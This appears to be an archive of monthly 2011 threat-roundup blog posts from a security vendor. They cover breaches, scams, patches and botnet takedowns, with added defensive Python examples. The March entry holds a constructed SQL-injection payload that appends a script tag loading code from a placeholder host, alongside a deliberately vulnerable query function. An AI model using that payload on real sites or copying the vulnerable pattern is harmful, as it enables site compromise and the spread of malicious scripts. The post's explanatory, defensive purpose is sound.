
This Month in the Threat Webscape - April 2011
Posted: 17 May 2011 05:03 PM

 

Major Hits


Automattic, the company behind WordPress.com, admitted a breach in which parts of its sensitive source code could have been copied. Even though WordPress itself is an open source project, there are apparently bits of the hosted service that are not that open.

We all presume that U.S. federal sites are the best protected. They really should be. However, the latest hack of the Oak Ridge National Laboratory showed the contrary. Spear-phishing is a real challenge for everyone these days.

April was also a month of data breaches, including marketing company Epsilon, the European Space Agency, and Sony. These breaches may have affected millions of individuals in the victims' recipient databases. Be wary of, and suspect, emails that appear to come from your usual and otherwise trustworthy senders: a stolen mailing list is a ready-made target list for spear-phishing. Remember also to change your passwords regularly.

With all of these breaches going around, the news of the kidnapping of Eugene Kaspersky's son sounded like something unusually new. It apparently took Russian police only a few days to free him from the kidnappers. It would be great if we could fix all data breaches so quickly.

 

Web 2 dot uh oh


How can you tell whether a Facebook scam is effective or not? By the number of "likes" it can gather. All you need is a very provocative title, like "The Hottest & Funniest Golf Course Video", then sit back and see how many Facebook users dare to click the Like button to see the video. As expected, the end result is a string of survey scams and no trace of the promised video.

Scammers are picky, too, sometimes, as demonstrated in "My Top 10 stalkers" scam. This scam targets specific countries based on the user's IP address. The U.S., Norway, U.K., and the United Arab Emirates are some of the targeted locations.

A CAPTCHA image sitting on top of a Facebook comment box was the bait in a recent clickjacking attack: the fake CAPTCHA hides the real Facebook control underneath, so "solving" it posts the scam on the victim's behalf. The lure promises yet another provocative video, while the real intent is, of course, to push surveys and games.

Facebook issued a fix on a glitch discovered by Turkish researcher Serkan Gencel involving users who linked their Facebook profile to a Hotmail email address.

In early April, reports surfaced about Google adding a banner to Gmail accounts warning the owner if someone from China had accessed the account. This sort of security blanket, along with Google's two-factor authentication, seems to be Google's response in the wake of the infamous Aurora attack.

Exploit kits appear to be stealing the spotlight from the usual rogue AV payload on poisoned search results. Searching for celebrity child "Presley Walker" returned poisoned image search results with both an exploit kit and rogue AV as payloads.

Apparently even Twitter users are curious to see who has been looking at their tweets. Twitter users who fall victim to the rogue app "Profile Spy" are offered endless surveys, pop-ups, and ads.

Smartphone apps invading privacy? That's the case federal prosecutors are making against Pandora, claiming that the company has been supplying advertisers with consumer information through one of its free smartphone apps running on Google's Android OS.


 

Browser and friends


This month Apple continued to fix security holes, including a few that were successfully exploited by Pwn2Own winners, through the iOS 4.3.2 / 4.2.7 software updates, which cover five documented security problems. Apple also released several other security updates, including Safari 5.0.5 and iTunes 10.2.2.

On April 15, Adobe released a security update for Adobe Flash Player to fix a new 0-day vulnerability (CVE-2011-0611), which could cause a crash and potentially allow an attacker to take control of the affected system. The same vulnerability was also being actively exploited against Adobe Reader and Acrobat, which carry their own copy of the Flash runtime (authplay.dll), via a Flash (.swf) file embedded in a Microsoft Word (.doc) or Excel (.xls) file. On April 21, Adobe came up with another important security update for Adobe Reader and Acrobat X to fix several vulnerabilities, including this one.
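Because the attacks above hide a Flash file inside an Office document, the practical check is to look for SWF headers inside any container regardless of its extension. The scanner below is an added example written for this roundup, not Websense, Adobe or Microsoft code. It searches a byte blob for the SWF signature (FWS uncompressed, CWS zlib-compressed), reads the version byte and the little-endian uncompressed length that follow it, and rejects candidates whose header does not add up (for CWS the zlib stream must inflate to exactly the declared length). The OLE magic bytes are the real compound-document signature; the sample container, the fake SWF bodies, and the version cut-off are constructed for the demo.

```python
import struct
import sys
import zlib

SWF_SIGNATURES = (b"FWS", b"CWS")   # uncompressed / zlib-compressed SWF; LZMA ('ZWS') is not handled here
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # real OLE2 compound document signature (.doc/.xls)
MAX_SWF_VERSION = 40   # assumption: anything above this is treated as a false positive
MIN_SWF_LENGTH = 21    # assumption: header (8) plus frame size/rate/count fields is already longer


def _plausible_header(blob, idx, sig, version, declared_len):
    """Sanity-check a candidate header so stray 'FWS'/'CWS' strings are not reported."""
    if not 1 <= version <= MAX_SWF_VERSION or declared_len < MIN_SWF_LENGTH:
        return False
    body = blob[idx + 8:]
    if sig == b"FWS":
        return declared_len <= len(body) + 8          # uncompressed length must fit the remaining bytes
    # CWS: the zlib stream must inflate cleanly and match the declared uncompressed length
    inflater = zlib.decompressobj()
    try:
        inflated = inflater.decompress(body)
    except zlib.error:
        return False
    return inflater.eof and len(inflated) + 8 == declared_len


def find_embedded_swf(blob):
    """Return [(offset, signature, version, declared_length)] for plausible SWF headers, by offset."""
    hits = []
    for sig in SWF_SIGNATURES:
        idx = blob.find(sig)
        while idx >= 0:
            if idx + 8 <= len(blob):
                version = blob[idx + 3]
                (declared_len,) = struct.unpack_from("<I", blob, idx + 4)
                if _plausible_header(blob, idx, sig, version, declared_len):
                    hits.append((idx, sig, version, declared_len))
            idx = blob.find(sig, idx + 1)
    return sorted(hits)


def make_fake_swf(compressed, body=bytes(range(40))):
    """Constructed stand-in for a SWF: a valid header over a meaningless body."""
    total_len = 8 + len(body)   # SWF FileLength counts the whole uncompressed file, header included
    header = (b"CWS" if compressed else b"FWS") + bytes([10]) + struct.pack("<I", total_len)
    return header + (zlib.compress(body) if compressed else body)


def build_sample_container():
    """Constructed OLE-looking blob: filler, a decoy 'FWS' string, then a CWS and an FWS payload."""
    return (OLE_MAGIC + b"\x00" * 64
            + b"FWS" + b"\x00" * 5          # decoy: version 0, length 0, must be ignored
            + b"A" * 16
            + make_fake_swf(compressed=True)
            + b"B" * 30
            + make_fake_swf(compressed=False)
            + b"C" * 10)


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_container()
    for offset, sig, version, length in find_embedded_swf(data):
        print(f"SWF {sig.decode()} v{version} at offset {offset}, declared length {length}")
```

Run it with a path to scan a real file, or with no arguments to scan the constructed sample. A hit is not proof of malice (documents can legitimately embed Flash), but an unexpected SWF inside a .doc or .xls arriving by email is exactly what this campaign looked like and deserves a closer look.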

Right after the Firefox 4 release last month, Mozilla delivered the first security update for Firefox 4, including a fix for two chunks of code that had allowed attackers to bypass address space layout randomization, a key security protection baked into recent versions of Windows. A notable security update for Firefox 3.6.17/3.5.19 fixes several vulnerabilities. Three of them, for bugs involving escalation of privilege through the Java Embedding Plugin, multiple dangling pointers, and miscellaneous memory safety hazards, were rated critical.

 

Microsoft


Microsoft released its biggest Patch Tuesday ever in April: 17 bulletins covering 64 vulnerabilities in Windows, Office, Internet Explorer, Visual Studio, SMB, the .NET Framework, and GDI+. Of these, 9 bulletins are rated critical and 8 important.

The most important fix is MS11-018, a cumulative security update for Internet Explorer. It is rated critical for Internet Explorer 6, 7, and 8 on Windows clients and moderate for the same versions on Windows servers; Internet Explorer 9 is not affected. Microsoft encouraged all users to apply this bulletin first.

The other eight critical bulletins fixed vulnerabilities in the SMB client and server, the .NET Framework, GDI+, DNS resolution, the JScript and VBScript scripting engines, and the OpenType CFF driver.

Of the 64 vulnerabilities Microsoft patched, 30 are addressed by a single bulletin, MS11-034, which resolves elevation-of-privilege vulnerabilities in the Windows kernel-mode drivers (win32k.sys). The MHTML cross-site scripting vulnerability CVE-2011-0096, unpatched since January, was finally fixed in MS11-026.

Beginning in April 2011, the Microsoft Vulnerability Research (MSVR) program started publishing MSVR Advisories for vulnerabilities that Microsoft had privately disclosed to third-party vendors. It published two advisories in April: one covering a use-after-free object lifetime vulnerability in Google Chrome, the other an HTML5 implementation vulnerability in Chrome and Opera. All of the vulnerabilities had already been patched by December 2010.

 

Hello ThreatSeeker® Network. You've got mail!


Another malicious e-card campaign hit unsuspecting users. What was on the menu this time? Nicely obfuscated content serving a spicy iframe leading to rogue AV. Sounds good to you? Sorry, we don't serve this juicy content to our users.

Do you have a small business, and wouldn't $1,500 make your month nicer? Well, forget about promises of easy money for an "innocent" money transfer. First you give up your confidential data to who-knows-who, and then you install a malicious "friend" on your computer.

Osama Bin Laden's death is big news. Everybody is curious and wants to see the proof. Why not, right? Be wary, though. It is better to live without the proof than to infect your computer with an unwelcome, maliciously crafted guest.

 

Security Trends


The "Coreflood" botnet was taken down by the U.S. Justice Department and the FBI. Coreflood was an infamous botnet that emerged almost a decade ago as a high-powered virtual weapon designed to knock targeted Web sites offline. While investigators counted 413,710 infected machines between March 2009 and January 2010, the total number of machines that were, or had been, part of Coreflood is more than 2.3 million, more than 1.8 million of them apparently located in the U.S.

A new marketplace has sprung up to buy and sell IPv4 addresses (or rather, to broker transfers from one organization to another with dollar figures attached). Sites like www.depository.net, www.addrex.net, and www.tradeipv4.com look like they'll be with us for a while.

Nikon's Image Authentication System has a vulnerability that revolves around cryptographic shortcomings in how the secret image-signing key is handled by Nikon digital cameras: the key can be extracted from the camera, after which anyone can sign arbitrary images. Russian encryption specialist ElcomSoft has already created a gallery of hoax images that pass validation in Nikon Image Authentication Software.

Apple's iPhone and iPad constantly track users' physical location and store the data in an unencrypted file on the iOS device and in any computer backups of it. That information can be used to reconstruct a detailed picture of the user's comings and goings.

 

Websense solutions with the ThreatSeeker Network and our Advanced Classification Engine (ACE) helped protect customers from April's blended threats.

 

This month's roundup contributors:

  • Ivan Sabo
  • Grace Timcang
  • Qiong Ran
  • Xue Yang
  • Lei Li

 

Filed under:

Ivan Sabo

This Month in the Threat Webscape - March 2011
Posted: 13 Apr 2011 02:12 PM

 

Month of March

 

Major hits

March 17 of this year will be remembered for a long time; in fact, we should celebrate it as BreachID Day from now on. RSA's Executive Chairman Art Coviello published an open letter giving a brief account of the breach, which happened in their "kitchen" as an "extremely sophisticated cyber attack" that put the SecurID product at risk. Even though the breach probably did not disclose any very sensitive data, it showed just how fragile security is.

 

Popular streaming service Spotify got compromised via third-party ads that served malicious content to all free users. Seems like free does come at a price after all.

 

Comodo, a certificate vendor, informed us that nine bogus SSL certificates had been issued for several top Alexa domains. The certificates were revoked immediately. Well, immediately once Comodo found out what had been going on. Comodo later said two more of its registration authorities had also been compromised; and, in fact, who knows what else?

 

Are you using TripAdvisor when planning your holidays? You really should expect more spam in the future. The company announced a breach in which member email data was stolen. Fortunately, no credit card details, for this time at least.

 

First the EU, then the French government: it looks like a new "fashion" hype. "We have been hacked!" or "attacked" or "infiltrated" or ... This month revealed more than one cyber attack. Probably we should just call it the BreachID Month after all this.

 

Some may think a couple of breaches a month is not that unusual. Well, there is more. Play.com let "only customer emails" go for a walk, with no idea where. Maybe they'll come back in fit form one day, won't they? Ah, and of course there is another one: PHP.net found some muddy tracks on one of its servers. You see, the BreachID Month suddenly makes more sense now.

 

Some may STILL say these are normal issues. We have one more in our back pocket, though. The LizaMoon mass SQL injection compromised hundreds of thousands of URLs in a matter of hours by appending a script tag to text columns in the sites' databases, sending visitors on to rogue AV; iTunes was one of the big names affected. You see, this March really was an unusual month in the end.
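To make the mechanics of a mass injection concrete, here is an added example (written for this roundup, not code from any affected site or from Websense). It uses an in-memory SQLite database as a stand-in for a site's content store, shows a page-view counter that concatenates a request parameter into SQL and runs it through an API that accepts stacked statements (executescript here models the database driver behaviour the real attack relied on), then the same counter written with type validation and bound parameters, and finally a detection sweep that reports every stored script tag pointing at a host outside the site's allowlist. The table rows, the payload host, and the allowlist are all constructed for the demo.

```python
import re
import sqlite3
from urllib.parse import urlparse

# Constructed payload in the shape of a mass-injection attack: finish the statement the site meant
# to run, append a script tag to every text row, and comment out whatever follows. Placeholder host.
INJECTED_HOST = "injected.example"
PAYLOAD = ("1; UPDATE articles SET body = body || "
           f"'<script src=\"http://{INJECTED_HOST}/ur.php\"></script>'; --")

ALLOWED_SCRIPT_HOSTS = {"www.example.com"}   # assumption: the site's own script host

SCRIPT_SRC = re.compile(r"<script\b[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.IGNORECASE)


def new_db():
    """In-memory stand-in for a site's content database (constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT, views INTEGER DEFAULT 0);
        INSERT INTO articles (title, body) VALUES
            ('Welcome', '<p>Hello</p><script src="http://www.example.com/site.js"></script>'),
            ('About',   '<p>About us</p>');
    """)
    return conn


def count_view_vulnerable(conn, page_id):
    """Concatenates the request parameter into SQL and hands it to an API that runs every
    statement it finds, so the attacker's UPDATE rides along with the intended one."""
    conn.executescript(f"UPDATE articles SET views = views + 1 WHERE id = {page_id};")


def count_view_safe(conn, page_id):
    """Validates the type and binds the value: the driver sees one statement and one integer."""
    pid = int(page_id)   # ValueError for anything that is not an integer, before any SQL runs
    return conn.execute("UPDATE articles SET views = views + 1 WHERE id = ?", (pid,)).rowcount


def find_injected_scripts(conn, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Sweep stored HTML for script tags whose host is not on the allowlist.
    Relative sources (no host) are same-origin and left alone."""
    findings = []
    for row_id, body in conn.execute("SELECT id, body FROM articles ORDER BY id"):
        for src in SCRIPT_SRC.findall(body or ""):
            host = urlparse(src).hostname
            if host is not None and host not in allowed_hosts:
                findings.append((row_id, src))
    return findings


if __name__ == "__main__":
    db = new_db()
    count_view_vulnerable(db, PAYLOAD)
    for row_id, src in find_injected_scripts(db):
        print(f"row {row_id}: foreign script {src}")
```

The sweep is the part worth keeping after the patch: a site that was injected once has the tag sitting in its database until someone removes it, and re-running the sweep on a schedule catches re-infection.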

 


Web 2 dot uh oh

Ashton Kutcher's Twitter account appeared to be hijacked in early March, posting two tweets on his behalf. The compromise raised questions about Twitter not protecting logged-in sessions with SSL by default.

 

Facebook recently introduced Report Suicidal Content, a service that would allow Facebook users to report any Facebook friend who has posted suicidal content on their accounts. This is in response to the growing number of suicidal posts in Facebook in the last few months.

 

A 17-year-old was arrested in Sydney in connection with the Facebook birthday hoax. The suspect apparently posted a birthday invite after creating a fake Facebook account in a girl's name, which then drew 200,000 positive replies.

 


Browser and friends

This month Apple had more stories to tell us. First, Apple released iTunes 10.2, patching a whopping 57 security vulnerabilities, some serious enough to give an attacker complete control if a user simply opens an image file or visits a compromised website; 50 of the 57 were fixed in WebKit. Apple also shipped a security update for the Pwn2Own vulnerability exploited by the winning hackers at Pwn2Own 2011, which was used to hijack an iPhone 4's address book when the user visited a rigged website hosting a Microsoft PowerPoint document via the phone's built-in Safari browser.

 

And finally, there is a Java update for Mac OS X users. The most serious flaw could allow an untrusted Java applet to execute arbitrary code outside the Java sandbox.

 

Adobe announced a Flash Player update to fix a critical security hole, a new 0-day vulnerability. The vulnerability could crash the system or let attackers in via a Flash (.swf) file embedded in a Microsoft Excel (.xls) file, delivered as an email attachment.

 

The Firefox 4 release included a number of significant security features. Mozilla also provided security updates for older browsers and added the fraudulent certificates from the "Comodo affair" to its certificate blacklist.

 

This month WordPress released version 3.1.1, which fixes three security issues.

 


Microsoft

Microsoft released three bulletins patching four security holes in Windows and Microsoft Office on this month's Patch Tuesday. Two vulnerabilities were fixed in the critical bulletin MS11-015, which resolves one publicly disclosed vulnerability, CVE-2011-0032 in DirectShow, and one privately reported vulnerability, CVE-2011-0042 in Windows Media Player and Windows Media Center. Both can only be triggered when a user opens a specially crafted Digital Video Recording (.dvr-ms) file; if the file is not opened, the attack fails.

 

The second update, MS11-016, patched the Microsoft Groove insecure library loading vulnerability CVE-2010-3146, which could allow remote code execution if a user opens a legitimate Groove-related file located in the same network directory as a maliciously crafted library file. Users whose accounts have administrative rights would be hit harder than users with fewer rights on the system.

 

The third one, MS11-017, rated "important", covers a code execution flaw, CVE-2011-0029, in the Windows Remote Desktop Client. Like the vulnerabilities in the first bulletin, the user has to open a specially crafted .rdp file for the attack to succeed.

 

Outside this batch of updates, some well-known vulnerabilities, such as the MHTML XSS vulnerability CVE-2011-0096, remain unpatched; Microsoft provides a Fix it workaround in an advisory to help users. For the Malware Protection Engine elevation of privilege vulnerability CVE-2011-0037, Microsoft notes that keeping the Microsoft Malware Protection Engine updated automatically resolves the issue.

 

Windows Internet Explorer 9 was released to the public on March 14, 2011. To protect the security and privacy of your information, IE9 introduces Tracking Protection and ActiveX Filtering. Tracking Protection lets the browser block communication with listed third-party sites to help keep your information private; ActiveX Filtering blocks ActiveX controls on all sites unless you allow them for a particular site. Other security features are also included, such as the SmartScreen Filter, the cross-site scripting (XSS) filter, and domain highlighting. IE9 runs on Windows Vista and Windows 7 but not on Windows XP.

 


Hello ThreatSeeker® Network. You've got mail!

One of the largest spam-generating botnets, Rustock, was taken down by Microsoft's Digital Crimes Unit and U.S. federal law enforcement agents. Global spam volumes have noticeably decreased since March 16.

 

Following the disaster in Japan on March 11, cybercriminals tried every possible underground technique to profit from it. Apart from the familiar vectors such as phishing and malicious spam emails, criminals also used viral Facebook applications.

 

Fake Facebook emails, the Black Hole exploit kit, and Zeus are three well-known tools and techniques criminals use on a daily basis. On March 18, a malicious campaign masquerading as Facebook notification emails was seen in the wild. The campaign originated from the Cutwail/Pushdo spam bot, and its link led to the Black Hole exploit kit, which served a Zeus/Zbot Trojan as the payload.
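The give-away in campaigns like this one is the link itself: the visible text says facebook.com, the href goes somewhere else. The checker below is an added example for this roundup (not Websense code and not tied to any real campaign sample); it parses a raw message with Python's email package, pulls every anchor out of the HTML part, and flags links whose visible text names a different host than the target or whose target is a bare IP address. The sample message is constructed, the 198.51.100.0/24 address is a documentation range, and the sender domain is a placeholder.

```python
import email
import ipaddress
import re
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample in the shape of the campaign: a "Facebook" notification whose visible link
# text names facebook.com while the real target is a bare IP address.
SAMPLE_EMAIL = """\
From: "Facebook" <notification+abc@facebookmail.example>
To: victim@example.org
Subject: You have 1 new message
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Hi, you have a new message.</p>
<p><a href="http://198.51.100.23/fb/login.php">http://www.facebook.com/n/?messages</a></p>
<p><a href="http://www.facebook.com/help/">Help Centre</a></p>
</body></html>
"""

# Visible anchor text that looks like a URL or a hostname (scheme optional).
URL_LIKE = re.compile(r"^(?:https?://)?(?:[\w-]+\.)+[a-z]{2,}(?:[/:?#]|$)", re.IGNORECASE)


class LinkCollector(HTMLParser):
    """Collects (href, visible text) pairs for every <a> in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def _host(url):
    if "://" not in url:
        url = "http://" + url
    return (urlparse(url).hostname or "").lower()


def _is_bare_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def suspicious_links(raw_message):
    """Return [(href, visible_text, [reasons])] for links worth blocking or flagging."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    part = msg.get_body(preferencelist=("html",))
    collector = LinkCollector()
    collector.feed(part.get_content() if part is not None else "")
    findings = []
    for href, text in collector.links:
        reasons = []
        target = _host(href)
        if URL_LIKE.match(text) and _host(text) != target:
            reasons.append(f"visible text names {_host(text)} but the link goes to {target}")
        if _is_bare_ip(target):
            reasons.append("link target is a bare IP address")
        if reasons:
            findings.append((href, text, reasons))
    return findings


if __name__ == "__main__":
    for href, text, reasons in suspicious_links(SAMPLE_EMAIL):
        print(href, "<-", repr(text), ";", "; ".join(reasons))
```

Neither rule is sufficient on its own (legitimate newsletters use tracking redirectors, and some intranets link by IP), but a Facebook-branded mail that trips both is a safe block, and the same collector can feed a host reputation lookup.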

 


Security trends

RIM has expanded its consumer offering with a service to locate, back up, and remotely wipe users' BlackBerry handsets. The free BlackBerry Protect service is now in open beta, with no IT department required behind the user. The application had been in closed beta since December but can now be downloaded from BlackBerry App World.

 

Security researcher Luigi Auriemma released proof-of-concept code for 34 vulnerabilities affecting popular SCADA products. The majority allow remote code execution on Internet-connected systems, with the remainder offering access to stored data.

 

A Dutch court ruled that breaking into an open wireless network is not a crime in the Netherlands. Dutch law defines a computer as a machine involved in the "storage, processing and transmission of data." Since a router is not used to store data, the judge reasoned that it fails to qualify as a computer, and thus the computer hacking law does not apply.

 

Intel has started working with customers that use embedded computers in all kinds of devices, following its $7.7 billion acquisition of security software maker McAfee. Security can be baked into devices such as printers, automated teller machines, televisions, and cars, and the two are drawing up plans to provide more security-assisting features in Intel's future chips.

 


This month's roundup contributors:

Ivan Sabo
Grace Timcang
Qiong Ran
Xue Yang
Artem Gololobov
Lei Li

Filed under:

Ivan Sabo

This Month in the Threat Webscape - February 2011
Posted: 07 Mar 2011 09:44 AM

 

Month of February

 

Major Hits

Two major compromises affected the UK in February. The Web sites for BBC 6 Music and BBC Radio 1Xtra were compromised and served a malicious iframe leading to the Phoenix exploit kit. In addition, AutoTrader, eBay, the London Stock Exchange, Myvue, and many other high-profile sites were hosting ads from an ad provider called Unanimis. This malvertising campaign occurred over a weekend and thus did not affect as many people as it might have on working days. The advertisement contained an iframe to another exploit kit that used attacks similar to those of the Black Hole exploit kit.

 

Night Dragon attacks were also active. Night Dragon targets U.S. oil, gas, and petrochemical companies, stealing proprietary and confidential information from executives by using a combination of social engineering, remote administration tools (RATs), and SQL injection attacks to gain access first to external and then to internal hosts inside the companies. The attackers are believed to be based in China, which may be why the class of attacks is called Night Dragon.

 

A leaderless and anarchic Internet group, Anonymous, declared war on HBGary Federal when the company's chief executive said he had uncovered, and planned to release, the identities of Anonymous' leaders using social networking sites. Anonymous broke into HBGary Federal's systems and released its internal confidential information. Whoops.

 

Several thousand small business and personal sites fell victim to an error by the U.S. Department of Homeland Security and Department of Justice. The departments announced the seizure of several domains involved in the distribution of child pornography. In addition to closing those domains, they managed to shut down a popular shared domain belonging to a free DNS provider, which took 84,000 other web sites, all subdomains of mooo.com, offline. After the incident, several thousand site owners found their sites replaced by a banner stating that advertising and distributing child pornography is illegal.

 

Researchers discovered a way to access passwords stored on the iPhone and iPad. The method requires physical access to the device and takes no more than six minutes, enough to carry out the procedure on a stolen or unattended device.

 

Gambling addiction did not benefit the hacker who admitted stealing $12m worth of gaming chips. Ashley Mitchell transferred 400 billion gaming chips into his fake Facebook account after gaining unauthorized access to the servers of game developer Zynga by posing as one of the site's administrators, and was trying to sell his illegal gain for about £180,000.

 

A major incident hit Australian cosmetics retailer Lush: hackers managed to access and steal the company's entire customer database along with customers' credit card details. The company had not been aware of the vulnerability, caused by not keeping its Web site software updated, and could not tell how long the breach had been going on.

 

Two major online dating sites, PlentyOfFish.com and eHarmony, were hacked, and the personal and password information of their users is believed to have been exposed. Ethical and legal questions were raised about how the companies should respond to, and compensate, such third-party security alerts.

 

A high-profile victim of malware attacks this month was Nasdaq. According to Nasdaq, there was no evidence that customer information had been exposed by the breach. Investigations continue to assess whether the anomalies in the stock market last summer were caused by stock exchange subversion.

 

Web 2 dot uh oh

A couple of Facebook security holes were discovered in February. The first was an authentication flaw that lets a malicious Web site disguise itself as another, legitimate site; it works only when the malicious site is visited while the user is logged into Facebook. The second is yet another chapter in the clickjacking saga, this time targeting Italian, Japanese, and Cyrillic-reading audiences. Promises of interesting and perhaps controversial videos led Facebook users to click the "Like" button without realising it.

 

Everybody wants to see who viewed their Facebook profile, and this scam is used over and over again to lure users into adding shady applications that promise to do just that but instead lead to survey scams. You don't even have to be a developer to run these survey scams, because they are usually built with a pre-packaged toolkit costing $25 or less.

 

Something you know and something you have are the ingredients of Google's 2-step verification, which is meant to make breaking into Google accounts much harder. It should serve users with weak passwords well, because a one-time password sent via text message or voice call is also required whenever a user enters his or her password. The feature is being made available to all of Google's free online services.
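The server side of "something you have" delivered by SMS or voice is small but easy to get wrong, so here is an added example (written for this roundup, not Google's implementation) of the part that matters: issuing a short random code, storing only a keyed hash of it, and accepting it exactly once, within a time limit, with a cap on wrong guesses so the six-digit space cannot be walked. The lifetime, attempt limit and per-process server key are assumptions; the clock is injectable so expiry can be tested without waiting.

```python
import hashlib
import hmac
import secrets
import time

CODE_DIGITS = 6
CODE_TTL_SECONDS = 300                 # assumption: a code is good for five minutes
MAX_ATTEMPTS = 3                       # assumption: three wrong guesses burn the code
SERVER_KEY = secrets.token_bytes(32)   # assumption: per-deployment secret, so a leaked table is useless alone


class OneTimeCodeStore:
    """Second-factor codes delivered out of band (SMS or voice call): issue, then verify exactly once."""

    def __init__(self, clock=time.time):
        self._clock = clock
        self._pending = {}   # username -> [tag, expires_at, attempts_left]

    @staticmethod
    def _tag(username, code):
        # Keyed hash: the store never holds the code itself, and without SERVER_KEY a six-digit
        # code cannot be recovered from the tag by trying all 10^6 values.
        return hmac.new(SERVER_KEY, f"{username}:{code}".encode(), hashlib.sha256).digest()

    def issue(self, username):
        """Create a fresh code for the user and return it for delivery; only its tag is stored."""
        code = f"{secrets.randbelow(10 ** CODE_DIGITS):0{CODE_DIGITS}d}"   # uniform over 000000..999999
        self._pending[username] = [self._tag(username, code), self._clock() + CODE_TTL_SECONDS, MAX_ATTEMPTS]
        return code

    def verify(self, username, submitted):
        """True exactly once for the right code within its lifetime; anything else is False."""
        entry = self._pending.get(username)
        if entry is None:
            return False
        tag, expires_at, attempts_left = entry
        if self._clock() > expires_at:
            del self._pending[username]       # expired codes are dropped, not retried
            return False
        if hmac.compare_digest(tag, self._tag(username, str(submitted))):
            del self._pending[username]       # single use: a replayed code must fail
            return True
        entry[2] = attempts_left - 1
        if entry[2] <= 0:
            del self._pending[username]       # lockout: guessing is capped at MAX_ATTEMPTS per code
        return False


if __name__ == "__main__":
    store = OneTimeCodeStore()
    code = store.issue("alice")           # in production this goes to the SMS/voice gateway
    print("accepted:", store.verify("alice", code))
    print("replay accepted:", store.verify("alice", code))
```

The code is only the second factor: it is checked after the password, never instead of it, and the lockout here is per issued code; a real deployment also throttles how often codes can be requested, since each request costs an SMS.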

 

The data war between Facebook and Google made headlines towards the end of February. After an update, Google's Nexus S Android phone will no longer present Facebook contacts as if they were integrated with its Android Contacts app. Until Facebook offers an export API similar to Gmail's, this standoff has yet to be concluded.

 

Browser and friends

Adobe delivered a group of patches in early February. Although no longer the top threat source, PDF exploits are still a favorite of cyber criminals. The security update for Adobe Reader and Acrobat fixed 29 vulnerabilities, 23 of which could cause the application to crash and potentially allow an attacker to take control of the affected system. Meanwhile, 13 vulnerabilities were patched in Adobe Flash Player and 21 in Adobe Shockwave Player.

 

As the application most targeted by exploits, Java got a security update this month: Oracle patched 21 Java security holes, 19 of which may be remotely exploitable.

 

Google has updated Chrome to 9.0.597.107 with 19 vulnerabilities fixed.

 

Also drawing attention is Pwn2Own 2011, to be held in March in Vancouver. The contest will reward hackers who successfully compromise IE, Safari, Firefox, or Chrome on a 64-bit system running the latest version of either OS X or Windows 7. Chrome was the only browser that survived last year; who will be the survivor this year?

 

Microsoft

On February's Patch Tuesday, Microsoft released twelve security bulletins. Three have a maximum severity rating of critical. The first, MS11-003, resolves four vulnerabilities in Internet Explorer that could allow remote code execution when a user visits a specially crafted Web page. The second, MS11-006, patches the vulnerability in Windows Shell graphics processing (CVE-2010-3970) disclosed last month. The last critical update, MS11-007, resolves a privately reported vulnerability in the Windows OpenType Compact Font Format (CFF) driver. The other nine bulletins are rated "important". Together the bulletins cover the Windows operating system, Internet Explorer, the Microsoft Office productivity suite, Visual Studio, and IIS. However, the recently disclosed cross-site scripting vulnerability in MHTML was still not fixed in February.

 

In addition to the twelve security bulletins, Microsoft also released an important non-security advisory (967940) related to Windows Autorun, pushed out through automatic updates. The update restricts AutoPlay to CD and DVD media, to help protect customers from attacks that execute arbitrary code via an Autorun.inf file when a USB flash drive is inserted, on network shares, and on other non-CD media containing a file system.

 

In the middle of February a new vulnerability was discovered in an SMB component of Windows (the Browser service's election handling). Microsoft's SRD team quickly posted a blog entry stating that exploiting it for remote code execution was unlikely and that a denial of service was the expected outcome.

 

At the end of February, Microsoft published security advisory 2491888 to remind customers of an update to the Microsoft Malware Protection Engine. It addresses a privately reported vulnerability that could allow elevation of privilege if the engine scans a system after an attacker with valid login credentials has created a specially crafted registry key. The vulnerability cannot be exploited by anonymous users.

 

Hello ThreatSeeker. You've got mail!

A recap of the past month kicks off with a noticeable increase in spam, as well as spammers going green: recycling templates or modifying slightly older campaigns to present them with a more current theme or touch, for a convincing effect on all who read them.

 

This was followed by that repeat offender, the magic blue pill with its mystical attributes, just in time for the Valentine's Day rush. This again aligned almost perfectly with the season, with couples stocking up for romantic getaways. Spammers prove time and again that they are very much in touch with hot trends and what is current.

 

Last, but by no means least, we have the use of social engineering to lure unsuspecting users into clicking a link in an email. The message titled "The refreshed site of our company" was not seen in high volumes but was an interesting find all the same, because it shared characteristics with malicious site compromises crossing over into the spam domain. This begs the question: is there a direct correlation between the two?

 

 

 

 

Security Trends

TippingPoint released details of 22 unpatched vulnerabilities from different vendors. TippingPoint operates the "Zero Day Initiative" bug bounty program and had announced that it would release details 180 days after becoming aware of a bug, even if the vendor has not yet released a patch.

 

Spam image pages have been swapped for scam alerts on imageshack.us. ImageShack said it found over 300 scam images uploaded to its service and replaced them with an alert image within an hour of their being reported.

 

Suspicious companies have started paying developers to embed spyware in mobile applications. Mobile users typically have less control over their devices than PC users, so more care should be taken when installing applications on mobile devices.

 

Visa has relaxed its rules so that European high street merchants who capture at least three-quarters of their transactions through EMV-enabled chip-and-PIN terminals will no longer have to pass Payment Card Industry Data Security Standard (PCI DSS) audits every year.

 

This month's roundup contributors:
Artem Gololobov
Ping Yan
Grace Timcang
Ulysses Wang
Xue Yang
Amon Sanniez
Lei Li

 

Filed under:

Ivan Sabo

This Month in the Threat Webscape - January 2011
Posted: 09 Feb 2011 06:15 PM

Month of January

Major Hits

Billy Rios came up with a neat way to bypass Flash's local-with-filesystem sandbox. To get local files from the hard drive to an external server he needed a protocol handler that Flash did not blacklist; his PoC shows how the MHTML protocol handler breaks the restrictions Adobe Flash defines. As the method looked so neat, somebody got inspired and successfully used the same protocol handler against Microsoft too.

 

